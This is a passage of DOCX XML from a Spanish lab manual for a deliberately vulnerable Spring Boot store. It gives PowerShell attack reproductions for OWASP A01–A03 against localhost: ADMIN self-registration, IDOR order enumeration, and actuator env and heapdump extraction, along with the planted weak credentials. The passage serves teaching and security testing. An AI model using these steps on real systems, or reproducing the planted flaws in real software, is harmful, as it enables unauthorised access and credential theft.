                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B2A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Nota: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Estas credenciales, junto con las contraseñas de la base de datos (tienda_user / tienda_pass_123) y el secreto JWT (app.jwt.secret en application.properties), son deliberadamente débiles y públicas dentro del repositorio. En la v2 deben migrarse a variables de entorno / gestor de secretos y las contraseñas deben almacenarse con BCrypt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B2A4A" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Guía de pruebas de penetración — réplica de las 10 vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Esta sección presenta, para cada categoría del OWASP Top 10:2025, el objetivo del ataque, el endpoint involucrado, el comando en PowerShell para reproducirlo contra el laboratorio (http://127.0.0.1:8080) y el resultado esperado. Se recomienda ejecutar cada prueba con el stack completo levantado (capítulo 5, Opción B) y registrar capturas de pantalla de la respuesta como evidencia.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0392B" w:sz="6"/>
              <w:left w:val="single" w:color="C0392B" w:sz="6"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="6"/>
              <w:right w:val="single" w:color="C0392B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="F5F0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Advertencia: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Todas las pruebas deben ejecutarse exclusivamente contra el entorno de laboratorio local (localhost). No reutilizar estos payloads contra sistemas de terceros ni en producción.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">A01 — Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El registro público permite que el propio cliente envíe el campo "role":"ADMIN" (ver RegistroRequest / AuthService.registrar), y el panel de administración (AdminController) solo valida que exista un JWT válido, sin comprobar el rol. Además, OrderController expone un IDOR: cualquier usuario autenticado puede leer pedidos ajenos iterando el id.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubicación en el código</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">backend: AuthController.registro() · AdminController.estaAutenticado() · OrderController.obtener()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / superficie de ataque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POST /api/auth/registro  →  GET /api/admin/usuarios  →  GET /api/pedidos/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Réplica en PowerShell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 1) Registrar un usuario auto-asignándose el rol ADMIN</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">$reg = @{ username="hacker"; email="hacker@lab.local"; password="Hacker123"; fullName="Hacker"; role="ADMIN" } | ConvertTo-Json</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Invoke-RestMethod -Uri "http://127.0.0.1:8080/api/auth/registro" -Method Post -ContentType "application/json" -Body $reg</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2) Iniciar sesión y capturar el token</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">$login = @{ username="hacker"; password="Hacker123" } | ConvertTo-Json</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>$resp = Invoke-RestMethod -Uri "http://127.0.0.1:8080/api/auth/login" -Method Post -ContentType "application/json" -Body $login</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">$token = $resp.data.token</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3) Acceder al panel admin con el token recién creado</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Invoke-RestMethod -Uri "http://127.0.0.1:8080/api/admin/usuarios" -Headers @{ Authorization = "Bearer $token" } | ConvertTo-Json -Depth 4</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4) IDOR: leer pedidos ajenos iterando el id (con CUALQUIER token válido)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">1..5 | ForEach-Object {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    Write-Host "--- Pedido $_ ---"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    Invoke-RestMethod -Uri "http://127.0.0.1:8080/api/pedidos/$_" -Headers @{ Authorization = "Bearer $token" }</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El registro con role=ADMIN se acepta sin restricción. El token resultante da acceso completo a /api/admin/usuarios (incluidas las contraseñas en texto plano de todos los usuarios). La iteración sobre /api/pedidos/{id} devuelve pedidos que no pertenecen al usuario autenticado.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0392B" w:sz="6"/>
              <w:left w:val="single" w:color="C0392B" w:sz="6"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="6"/>
              <w:right w:val="single" w:color="C0392B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="F5F0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidencia a capturar: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Captura del JSON de /api/admin/usuarios mostrando usuarios y passwords, y de al menos dos pedidos ajenos obtenidos por IDOR.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">A02 — Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El Actuator de Spring Boot está expuesto por completo sin autenticación (management.endpoints.web.exposure.include=*), CORS acepta cualquier origen (WebConfig), las credenciales de base de datos están hardcodeadas en application.properties y el modo debug está activo, exponiendo detalle adicional en los errores.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubicación en el código</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">backend: application.properties · config/ActuatorConfig.java · config/WebConfig.java</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / superficie de ataque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GET /actuator/env · GET /actuator/info · GET /actuator/heapdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Réplica en PowerShell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 Variables de entorno del proceso (incluye password de BD)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Invoke-RestMethod -Uri "http://127.0.0.1:8080/actuator/env" | ConvertTo-Json -Depth 6</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Info "custom" que expone host/usuario de la base de datos a propósito</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Invoke-RestMethod -Uri "http://127.0.0.1:8080/actuator/info" | ConvertTo-Json -Depth 4</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Volcado de memoria del proceso (heap dump) -- puede tardar y pesar varios MB</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Invoke-WebRequest -Uri "http://127.0.0.1:8080/actuator/heapdump" -OutFile "heapdump.hprof"</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Verificar CORS abierto (el backend responde con Access-Control-Allow-Origin: *)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>(Invoke-WebRequest -Uri "http://127.0.0.1:8080/api/productos" -Headers @{ Origin = "http://sitio-malicioso.evil" }).Headers["Access-Control-Allow-Origin"]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Los tres endpoints de Actuator responden sin pedir credenciales, exponiendo variables de entorno, metadatos internos y (en el caso de heapdump) un volcado completo de la memoria del proceso, del cual pueden extraerse secretos en memoria (tokens, passwords).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0392B" w:sz="6"/>
              <w:left w:val="single" w:color="C0392B" w:sz="6"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="6"/>
              <w:right w:val="single" w:color="C0392B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="F5F0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidencia a capturar: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Captura de /actuator/env mostrando spring.datasource.password y del header Access-Control-Allow-Origin: *.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">A03 — Software Supply Chain Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El pom.xml del backend declara a propósito log4j-core 2.14.1, una versión antigua asociada a vulnerabilidades públicas conocidas. El objetivo de esta sección no es explotar la CVE dentro de la aplicación, sino demostrar cómo detectar y gestionar una dependencia vulnerable de forma automatizada en la cadena de suministro de software, tal como haría un pipeline de CI/CD real. El logger principal del proyecto continúa siendo Logback.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubicación en el código</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backend/pom.xml (dependencias log4j-core con versión fijada a propósito)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / superficie de ataque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Análisis estático de dependencias (no es un endpoint HTTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Réplica en PowerShell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cd backend</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">mvn org.owasp:dependency-check-maven:check</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El reporte HTML se genera en:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1B1B1B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Start-Process "target\dependency-check-report.html"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Resultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El reporte de OWASP Dependency-Check identifica log4j-core 2.14.1 como dependencias con CVE conocidos y públicos, con su puntuación CVSS y enlaces a las bases de datos oficiales (NVD).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0392B" w:sz="6"/>
              <w:left w:val="single" w:color="C0392B" w:sz="6"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="6"/>
              <w:right w:val="single" w:color="C0392B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="F5F0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Evidencia a capturar: Captura del reporte HTML de Dependency-Check listando los CVE detectados para log4j-core 2.14.1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">A04 — Cryptographic Failures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
